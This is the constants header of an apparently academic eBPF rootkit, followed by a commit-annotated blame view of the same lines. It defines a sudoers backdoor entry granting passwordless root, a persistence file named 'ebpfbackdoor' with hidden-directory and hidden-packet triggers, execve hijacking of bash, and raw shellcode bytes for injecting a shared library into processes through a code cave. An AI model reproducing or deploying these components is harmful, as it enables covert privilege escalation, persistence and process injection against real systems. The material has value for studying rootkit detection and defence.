src/common/constants.h

#ifndef __CONSTANTS_H
#define __CONSTANTS_H

//XDP
#define SECRET_PACKET_PAYLOAD "XDP_PoC_0"
#define SECRET_PACKET_DEST_PORT 9000
#define SUBSTITUTION_NEW_PAYLOAD "The previous message has been hidden"


//FS
#define STRING_FS_HIDE "This won't be seen"
#define STRING_FS_OVERWRITE "That is now hidden"

#define STRING_FS_SUDO_TASK "sudo"
#define STRING_FS_SUDO_TASK_LEN 5
#define STRING_FS_SUDOERS_FILE "/etc/sudoers"
#define STRING_FS_SUDOERS_FILE_LEN 13
#define STRING_FS_SUDOERS_ENTRY "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"
#define STRING_FS_SUDOERS_ENTRY_LEN 37

#define SECRET_DIRECTORY_NAME_HIDE "SECRETDIR"
#define SECRET_FILE_PERSISTENCE_NAME "ebpfbackdoor"

//EXECUTION HIJACKING

#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#define EXEC_HIJACK_ACTIVE 0 //0 Deactivated, 1 active
#define TASK_COMM_NAME_RESTRICT_HIJACK "bash"
#define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1

//LIBRARY INJECTION WITH ROP
#define TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME "simple_timer"
#define TASK_COMM_FILTER 1 //0 do not filter by task. 1 filter by task.
#define TASK_COMM_NAME_INJECTION_TARGET_OPEN "simple_open"

#define CODE_CAVE_ADDRESS_STATIC 0x00000000004012c4
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1 \
"\x55\x50\x51\x52\x53\x57\x56\
\xbf\x00\x20\x00\x00\x48\xbb"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN 14

#define CODE_CAVE_SHELLCODE_ASSEMBLE_2 \
"\xff\xd3\x48\x89\xc3\xc7\x00\x2f\x68\x6f\x6d\
\xc7\x40\x04\x65\x2f\x6f\x73\xc7\x40\x08\x62\x6f\x78\
\x65\xc7\x40\x0c\x73\x2f\x54\x46\xc7\x40\x10\x47\x2f\
\x73\x72\xc7\x40\x14\x63\x2f\x68\x65\xc7\x40\x18\x6c\
\x70\x65\x72\xc7\x40\x1c\x73\x2f\x69\x6e\xc7\x40\x20\
\x6a\x65\x63\x74\xc7\x40\x24\x69\x6f\x6e\x5f\xc7\x40\
\x28\x6c\x69\x62\x2e\xc7\x40\x2c\x73\x6f\x00\x00\x48\
\xb8"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN 90

#define CODE_CAVE_SHELLCODE_ASSEMBLE_3 \
"\xbe\x01\x00\x00\x00\x48\x89\xdf\
\x48\x81\xec\x00\x10\x00\x00\xff\
\xd0\x48\x81\xc4\x00\x10\x00\x00\x5e\
\x5f\x5b\x5a\x59\x58\x5d\xff\x25\x00\x00\x00\x00"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 37

#endif
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`#ifndef __CONSTANTS_H`
			`#define __CONSTANTS_H`

Completed output modification of sys_read. Created a simple PoC 2022-01-16 06:45:45 -05:00			`//XDP`
Made it work with an arbitrary length payload. Generalization with constants.h, now the PoC can be used for any shrinking/enlarging value. Discovered a very curious bug 2021-11-27 17:01:10 -05:00			`#define SECRET_PACKET_PAYLOAD "XDP_PoC_0"`
Further refactored code and dealt with the verifier issues with string comparisons 2021-11-24 12:17:31 -05:00			`#define SECRET_PACKET_DEST_PORT 9000`
Finished section 5. Multiple changes in the code according to the performed tests. 2022-06-19 14:35:19 -04:00			`#define SUBSTITUTION_NEW_PAYLOAD "The previous message has been hidden"`
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00
Added new hooks and updated map fields to support new sudo module. 2022-02-05 13:49:20 -05:00
Completed output modification of sys_read. Created a simple PoC 2022-01-16 06:45:45 -05:00			`//FS`
			`#define STRING_FS_HIDE "This won't be seen"`
			`#define STRING_FS_OVERWRITE "That is now hidden"`

Added new hooks and updated map fields to support new sudo module. 2022-02-05 13:49:20 -05:00			`#define STRING_FS_SUDO_TASK "sudo"`
			`#define STRING_FS_SUDO_TASK_LEN 5`
			`#define STRING_FS_SUDOERS_FILE "/etc/sudoers"`
			`#define STRING_FS_SUDOERS_FILE_LEN 13`
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00			`#define STRING_FS_SUDOERS_ENTRY "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"`
			`#define STRING_FS_SUDOERS_ENTRY_LEN 37`
Added new hooks and updated map fields to support new sudo module. 2022-02-05 13:49:20 -05:00
Added obfuscation for the persistance access using cron 2022-05-16 17:34:21 -04:00			`#define SECRET_DIRECTORY_NAME_HIDE "SECRETDIR"`
			`#define SECRET_FILE_PERSISTENCE_NAME "ebpfbackdoor"`
Added hide directory capabilities for the rootkit 2022-05-16 11:24:59 -04:00
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`//EXECUTION HIJACKING`

Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular 2022-05-15 20:47:58 -04:00			`#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"`
Finished section 5. Multiple changes in the code according to the performed tests. 2022-06-19 14:35:19 -04:00			`#define EXEC_HIJACK_ACTIVE 0 //0 Deactivated, 1 active`
Continued with execve hijacking. 2022-06-13 22:16:34 -04:00			`#define TASK_COMM_NAME_RESTRICT_HIJACK "bash"`
			`#define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1`
Finished execve hijacking, added new last checks and discovered why sometimes it fails. New detached process at the userspace. Other fixes 2022-05-07 10:36:46 -04:00
Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00			`//LIBRARY INJECTION WITH ROP`
Added sys_openat for the injection module, fully working! 2022-05-16 08:02:38 -04:00			`#define TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME "simple_timer"`
Added multiple small changes to client and code, submitting almost finished chapter 5 2022-06-18 10:57:10 -04:00			`#define TASK_COMM_FILTER 1 //0 do not filter by task. 1 filter by task.`
			`#define TASK_COMM_NAME_INJECTION_TARGET_OPEN "simple_open"`

New explanation for the injection technique (alternative scanning process) and added flow diagram with full process. 2022-06-13 10:57:32 -04:00			`#define CODE_CAVE_ADDRESS_STATIC 0x00000000004012c4`
Introduced shellcode and finished code cave writing and injection. RELRO working 2022-04-07 11:54:24 -04:00			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_1 \`
Changed shellcode to include backup of registers and stuck. Now prevents stack smashing detection via the stack canaries 2022-04-07 19:47:53 -04:00			`"\x55\x50\x51\x52\x53\x57\x56\`
			`\xbf\x00\x20\x00\x00\x48\xbb"`
			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN 14`
Introduced shellcode and finished code cave writing and injection. RELRO working 2022-04-07 11:54:24 -04:00
			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_2 \`
			`"\xff\xd3\x48\x89\xc3\xc7\x00\x2f\x68\x6f\x6d\`
			`\xc7\x40\x04\x65\x2f\x6f\x73\xc7\x40\x08\x62\x6f\x78\`
			`\x65\xc7\x40\x0c\x73\x2f\x54\x46\xc7\x40\x10\x47\x2f\`
			`\x73\x72\xc7\x40\x14\x63\x2f\x68\x65\xc7\x40\x18\x6c\`
			`\x70\x65\x72\xc7\x40\x1c\x73\x2f\x69\x6e\xc7\x40\x20\`
			`\x6a\x65\x63\x74\xc7\x40\x24\x69\x6f\x6e\x5f\xc7\x40\`
			`\x28\x6c\x69\x62\x2e\xc7\x40\x2c\x73\x6f\x00\x00\x48\`
			`\xb8"`
			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN 90`

			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_3 \`
Changed shellcode to include backup of registers and stuck. Now prevents stack smashing detection via the stack canaries 2022-04-07 19:47:53 -04:00			`"\xbe\x01\x00\x00\x00\x48\x89\xdf\`
			`\x48\x81\xec\x00\x10\x00\x00\xff\`
			`\xd0\x48\x81\xc4\x00\x10\x00\x00\x5e\`
Now control flow is redirected back to the syscall after running the shared library constructor instead of skipping it 2022-04-09 14:17:09 -04:00			`\x5f\x5b\x5a\x59\x58\x5d\xff\x25\x00\x00\x00\x00"`
			`#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 37`
Introduced shellcode and finished code cave writing and injection. RELRO working 2022-04-07 11:54:24 -04:00
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`#endif`